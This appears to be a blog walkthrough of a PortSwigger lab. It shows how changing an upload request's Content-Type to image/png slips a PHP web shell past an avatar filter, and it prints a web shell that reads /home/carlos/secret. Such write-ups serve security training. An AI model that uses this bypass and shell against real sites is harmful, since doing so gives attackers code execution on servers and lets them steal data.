PortSwigger Lab: Web shell upload via Content-Type restriction bypass | WalkThrough

Introduction

Hello everyone, in this post I am going to share the writeup of PortSwigger Lab( Web shell upload via Content-Type restriction bypass) . After signing in wiener account we will see a avatar upload function which is not allowing application/x-php file. After changing the content type, we can upload our web-shell and can have code execution on the machine. Further we can read the content of /home/carlos/secret and can solve this lab.

Objective

This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Detection

Login with the given credentials wiener:peter .

Under My Account section there is a Avatar upload function . we will upload a php web-shell in this field . Before sending the exploit code lets send this php code first.

<?phpphpinfo();?>

As we can see the website is not allowing application/x-php content type so we need to change the content type to either image/png or image/jpeg .

The file has been successfully uploaded . To access the file right click on wiener’s profile photo and click on view image.

Exploitation

Now lets send the exploit php code .

<?php
system("cat /home/carlos/secret");
?>

We now have successful RCE on the machine . Now submit this secret to solve the lab.

--

--

--

eJPT | eCPPT | DarkArmy CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Tutorial Fuzzy Logic Mamdani for Arduino

Tutorial Fuzzy Logic Mamdani for Arduino

Apache Beam & Open Telemetry

Code Smell 48 — Code Without Standards

Is Enterprise Architecture (EA) Dead in Digital?

Self-documenting code is (mostly) nonsense

My Transformational Journey; An Intern to a Full-time Employee

Balancing Between Product Experimentation and Software Reliability

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
WraithOP

WraithOP

eJPT | eCPPT | DarkArmy CTF Player

More from Medium

Understand Broken Authentication in 3 minutes

vulnerable API (vAPI) writeup

Journey to the first 2 CVEs

wtfCTF 2022— web challenge [1–4] WalkThrough